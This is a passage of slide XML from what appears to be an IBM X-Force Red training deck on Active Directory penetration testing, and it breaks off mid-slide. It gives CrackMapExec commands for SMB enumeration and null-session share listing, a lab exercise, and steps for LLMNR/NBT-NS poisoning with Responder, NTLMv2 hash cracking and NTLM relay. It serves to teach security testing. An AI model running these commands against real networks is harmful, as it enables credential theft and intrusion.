                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>cme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t> 172.16.14.192/26 --gen-relay-list relay.txt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:highlight>
                <a:srgbClr val="808080"/>
              </a:highlight>
              <a:latin typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" pitchFamily="2" charset="2"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Null Session Enumeration </a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="-140970"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>cme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t> 172.16.14.192 -u '' -p '' --shares</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:latin typeface="IBM Plex Sans"/>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9" name="Picture 4" descr="cme">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C5FC077-BBFF-A64C-923B-D434056E0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09" y="952910"/>
            <a:ext cx="1944392" cy="323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962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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="770C28"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lab 1</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marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>Target Scope:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>cat ~/scope.txt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0">
              <a:highlight>
                <a:srgbClr val="808080"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>Use CME to enumerate which boxes are running SMB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial,Sans-Serif" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Provide the following of the three domain controllers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="-285750">
              <a:buFont typeface="Arial,Sans-Serif" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>IP / Hostname / Domain</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial,Sans-Serif" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>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389632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No AD Access &gt; LLMNR/NBT-NS Poisoning</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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These responses can be spoofed so victims will communicate with the tester machine, allowing for a man in the middle to capture the NTLMv1 and NTLMv2 authentication requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These NTLMv2 responses can be taken and cracked using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hashcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> mode 5600 or be used in a relay attack (explained later)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This can be done with the python tool Responder </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="-140970">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>responder –I eth0 –v</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="IBM Plex Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="IBM Plex Sans" panose="020B0503050203000203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans" panose="020B0503050203000203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3758951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Initial Access &gt; No AD Access &gt; LLMNR/NBT-NS Poisoning</a:t>
            </a:r>
          </a:p>
          <a:p>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68D95"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="IBM Plex Sans Light"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>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868D95"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="IBM Plex Sans Light"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0029156C-FA0B-8D2A-6317-64E739E26B9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 14" descr="Several icons on a white background&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95163FE2-93CA-43B5-A5B0-9050805FC72C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="735336" y="450730"/>
            <a:ext cx="7673327" cy="4386714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 16" descr="Several icons on a white background&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82AAB74B-2060-4585-B87B-DE5C90B6D3CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="740652" y="450730"/>
            <a:ext cx="7668011" cy="4386714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture 18" descr="A close-up of several icons&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51EB1636-E0DE-496F-99E2-5297614A0033}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="740652" y="450226"/>
            <a:ext cx="7668011" cy="4383674"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Picture 20" descr="A diagram of a computer system&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDF596F1-BDC6-4B9B-A709-8C7CD6A5D6B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="740652" y="451997"/>
            <a:ext cx="7668010" cy="4383675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Picture 22" descr="A diagram of a computer network&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A60C8CF-4D61-4835-822A-62FE4816A341}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="742010" y="451997"/>
            <a:ext cx="7661338" cy="4379860"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="Picture 24" descr="A diagram of a computer network&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19848E55-3C49-489E-9A8E-C0F3828C6A6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="746276" y="455542"/>
            <a:ext cx="7650397" cy="4373606"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Picture 26" descr="A diagram of a computer network&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1996708F-CC0D-4EE5-8B5D-2EBD6677A4C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="745967" y="455542"/>
            <a:ext cx="7650397" cy="4373606"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="Picture 28" descr="A diagram of a computer network&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63E34A65-33B4-46E1-8C47-2AFEC10A5290}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="746276" y="458522"/>
            <a:ext cx="7650088" cy="4373429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="31" name="Picture 30" descr="A diagram of a computer network&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E6648F8-0B07-4CB1-963D-D8105C1D69A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="746275" y="455542"/>
            <a:ext cx="7650397" cy="4373606"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22184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FE34-1696-4DA8-89DA-EA1703F0D631}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="177661" y="168516"/>
            <a:ext cx="6615642" cy="630936"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Initial Access &gt; No AD Access &gt; Net-NTLM Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B99325D0-2467-4CA5-8AE7-453F0BFB1742}"/>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868D95"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="IBM Plex Sans Light"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>IBM Security X-Force Red / © 2020 IBM Corporation</a:t>
            </a:r>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sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7ABCF685-10FF-4AA3-AE45-80854BAB2E7C}"/>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868D95"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="IBM Plex Sans Light"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Picture 21" descr="A long shot of a computer screen&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39337D5D-C676-4DC9-9E1C-801F1614884C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1737127" y="483984"/>
            <a:ext cx="5669745" cy="4396360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="39" name="Picture 38" descr="A computer screen shot of a computer&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC0BCF00-C1E2-416B-A832-AD3FBD299E78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1737126" y="478465"/>
            <a:ext cx="5669745" cy="4396360"/>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645D5C50-A360-4198-9CB7-17E6BCAE2547}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1737125" y="483984"/>
            <a:ext cx="5669745" cy="4396360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="43" name="Picture 42" descr="A screenshot of a computer&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{620B8668-F34A-4B4A-B15E-2612A3F9C18D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1737127" y="483984"/>
            <a:ext cx="5669743" cy="4396358"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="45" name="Picture 44" descr="A screenshot of a computer&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C91D539-C27E-4BDF-8C15-41817E6BE0AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1737127" y="483982"/>
            <a:ext cx="5669743" cy="4396358"/>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99A7BC51-A442-4E47-BB57-B1A5485509F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1737127" y="487768"/>
            <a:ext cx="5669743" cy="4396359"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="49" name="Picture 48" descr="A screenshot of a computer&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBE697AD-A37E-4D70-99A3-37A3C7B11700}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1737122" y="487768"/>
            <a:ext cx="5669743" cy="4396359"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="51" name="Picture 50" descr="A screenshot of a computer flowchart&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D4966F2-1C30-4981-B703-860D654B8134}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1737117" y="483781"/>
            <a:ext cx="5669745" cy="4396360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="57" name="Picture 56" descr="A screenshot of a computer flowchart&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0BD7C7D-D72D-42FA-871C-F2F5AC363B60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1737137" y="487768"/>
            <a:ext cx="5669735" cy="4396352"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="168929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No AD Access &gt; NTLM Relay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25</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r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Without SMB/LDAP* signing, an NTLM relay can be performed using ntlmrelayx.py from the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>impacket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> suite of tools. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="-140970">
